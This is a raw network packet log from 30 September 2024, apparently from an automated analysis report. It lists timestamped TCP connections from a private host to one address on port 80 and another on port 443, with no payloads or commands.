                                                                                                                                                              Sep 30, 2024 15:38:17.653270006 CEST8049728187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:17.653536081 CEST8049728187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:17.653594971 CEST4972880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:17.654136896 CEST4972880192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:17.658940077 CEST8049728187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:17.683547974 CEST4972980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:17.688718081 CEST8049729187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:17.688791990 CEST4972980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:17.688922882 CEST4972980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:17.688955069 CEST4972980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:17.694641113 CEST8049729187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:17.694653034 CEST8049729187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:18.643527031 CEST8049729187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:18.643544912 CEST8049729187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:18.643606901 CEST4972980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:18.643753052 CEST4972980192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:18.648552895 CEST8049729187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:18.662352085 CEST4973080192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:18.667349100 CEST8049730187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:18.667440891 CEST4973080192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:18.667552948 CEST4973080192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:18.667552948 CEST4973080192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:18.672755003 CEST8049730187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:18.673120975 CEST8049730187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:19.630750895 CEST8049730187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:19.631556988 CEST8049730187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:19.631633043 CEST4973080192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:19.633549929 CEST4973080192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:19.638622046 CEST8049730187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:20.073198080 CEST4973180192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:20.078147888 CEST8049731187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:20.080487967 CEST4973180192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:20.111666918 CEST4973180192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:20.111700058 CEST4973180192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:20.116596937 CEST8049731187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:20.116614103 CEST8049731187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:21.247132063 CEST8049731187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:21.247581005 CEST8049731187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:21.247631073 CEST4973180192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:21.247684002 CEST4973180192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:21.252470970 CEST8049731187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:21.260822058 CEST4973280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:21.265579939 CEST8049732187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:21.265639067 CEST4973280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:21.268733025 CEST4973280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:21.268760920 CEST4973280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:21.273447037 CEST8049732187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:21.273612022 CEST8049732187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:22.218976021 CEST8049732187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:22.219073057 CEST8049732187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:22.219163895 CEST4973280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:22.219329119 CEST4973280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:22.223440886 CEST4973380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:22.224131107 CEST8049732187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:22.228322983 CEST8049733187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:22.228724003 CEST4973380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:22.228885889 CEST4973380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:22.228909016 CEST4973380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:22.233663082 CEST8049733187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:22.233800888 CEST8049733187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:23.187736034 CEST8049733187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:23.192181110 CEST8049733187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:23.194438934 CEST4973380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:23.201827049 CEST4973380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:23.206926107 CEST8049733187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:23.838541031 CEST4973480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:23.843334913 CEST8049734187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:23.843424082 CEST4973480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:23.843585968 CEST4973480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:23.843626976 CEST4973480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:23.848495960 CEST8049734187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:23.848526001 CEST8049734187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:24.807872057 CEST8049734187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:24.808105946 CEST8049734187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:24.808335066 CEST4973480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:24.809371948 CEST4973480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:24.811249018 CEST4973580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:24.814707041 CEST8049734187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:24.816431999 CEST8049735187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:24.816505909 CEST4973580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:24.816634893 CEST4973580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:24.816654921 CEST4973580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:24.821643114 CEST8049735187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:24.821656942 CEST8049735187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.005872011 CEST8049735187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.005892038 CEST8049735187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.005913973 CEST8049735187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.006012917 CEST4973580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.006047010 CEST4973580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.006558895 CEST4973580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.009639025 CEST4973680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.011775017 CEST8049735187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.014472008 CEST8049736187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.014545918 CEST4973680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.014683008 CEST4973680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.014754057 CEST4973680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.019818068 CEST8049736187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.019876003 CEST8049736187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.988398075 CEST8049736187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.988513947 CEST8049736187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.988642931 CEST4973680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.988852978 CEST4973680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.991780043 CEST4973780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.993630886 CEST8049736187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.996695995 CEST8049737187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:26.998327971 CEST4973780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.998444080 CEST4973780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:26.998467922 CEST4973780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:27.003369093 CEST8049737187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:27.003509045 CEST8049737187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:27.980511904 CEST8049737187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:27.984683037 CEST8049737187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:27.988457918 CEST4973780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:27.991147995 CEST4973780192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:38:27.996885061 CEST8049737187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:43.859518051 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:43.859575987 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:43.859678984 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:43.860057116 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:43.860068083 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.486454010 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.486546993 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.494554043 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.494589090 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.495179892 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.498835087 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.498864889 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.498879910 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.836515903 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.836539984 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.836616993 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.836643934 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.886589050 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.886614084 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.926820993 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.926887035 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.926963091 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.926995039 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.927011967 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.927186966 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.927196980 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.927239895 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.927253008 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.968188047 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.968198061 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.968342066 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.968365908 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.970397949 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.970406055 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.970433950 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.970472097 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:44.970490932 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:44.970503092 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.011579037 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.024482012 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.024496078 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.024521112 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.024581909 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.024615049 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.024629116 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.025407076 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.025414944 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.025453091 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.025484085 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.025496960 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.025511026 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.026668072 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.026676893 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.026730061 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.026741982 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.026751995 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.039237976 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.039247036 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.039321899 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.039343119 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.058898926 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.058933020 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.058988094 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.059015036 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.059030056 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.061146975 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.061188936 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.061217070 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.061234951 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.061248064 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.084117889 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.084211111 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.084233046 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.084541082 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.084549904 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.084830046 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.084841013 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.115187883 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.115236998 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.115293026 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.115319014 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.115338087 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.116234064 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.116244078 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.116316080 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.116328955 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.116899967 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.116909981 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.116961956 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.116974115 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.129868984 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.129911900 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.129967928 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.129988909 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.130002975 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.130462885 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.130501986 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.130520105 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.130530119 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.130547047 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.149405003 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.149492979 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.149516106 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.151299953 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.151333094 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.151395082 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.151407003 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.151429892 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.151709080 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.151956081 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.151966095 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.152249098 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.152308941 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.152317047 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.153160095 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.153237104 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.153247118 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.175872087 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.175997019 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.176013947 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.176253080 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.176264048 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.176331997 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.176342964 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.205507994 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.205600023 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.205617905 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.205797911 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.205809116 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.205852032 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.205861092 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.205874920 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.206562996 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.206599951 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.206615925 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.206630945 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.206645012 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.206727028 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.206780910 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.206790924 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.207624912 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.207688093 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.207696915 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.208327055 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.208385944 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.208395004 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.219882965 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.219994068 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.220010042 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.220110893 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.220174074 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.220182896 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.220362902 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.220427036 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.220434904 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.239733934 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.239814997 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.239840984 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.239861012 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.239877939 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.239893913 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.239943981 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.240099907 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.240117073 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.240129948 CEST49738443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.240137100 CEST4434973823.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.283763885 CEST49739443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.283817053 CEST4434973923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.283912897 CEST49739443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.284271002 CEST49739443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.284281015 CEST4434973923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.883558035 CEST4434973923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.883657932 CEST49739443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.884994030 CEST49739443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.885005951 CEST4434973923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.885286093 CEST4434973923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:45.886084080 CEST49739443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.886113882 CEST49739443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:38:45.886117935 CEST4434973923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:46.251578093 CEST4434973923.145.40.162192.168.2.8
